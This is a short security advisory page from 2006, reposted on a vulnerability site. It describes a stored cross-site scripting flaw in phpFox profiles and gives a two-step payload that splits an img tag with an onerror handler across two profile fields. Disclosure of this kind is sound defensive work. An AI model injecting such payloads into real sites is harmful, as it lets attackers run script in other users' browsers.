Computer Security

Security Advisory: phpFox XSS Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  GreenBeast CMS <= 1.3 PHP Arbitrary File Upload Vulnerability

  [Full-disclosure] DigiOz Guestbook version 1.7 Path Disclosure Vulnerability in list.php

  AIOCP <=1.3.007 multiples vulnerabilities [sql , remote file include , xss]

  MWChat pro V 7.0 <= (CONFIG[MWCHAT_Li
bs]) Remote File Include Vulnerability

From:Maximize Designs <emeckz_(at)_gmail.com>
Date:07.11.2006
Subject:phpFox XSS Injection

#Exploit found by Maximize
# --> jjj.zkpber.pbz <--
-------------------------------------------------------------------
Step1: When editing your profile, in the about me section put the following
code
<img src="http://xss.xss/xss.jpg" z='

Step2: In the field under the About me section put the following:

'onerror="alert('XSS');" />


View your profile and watch the magic of XSS!
-------------------------------------------------------------------
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru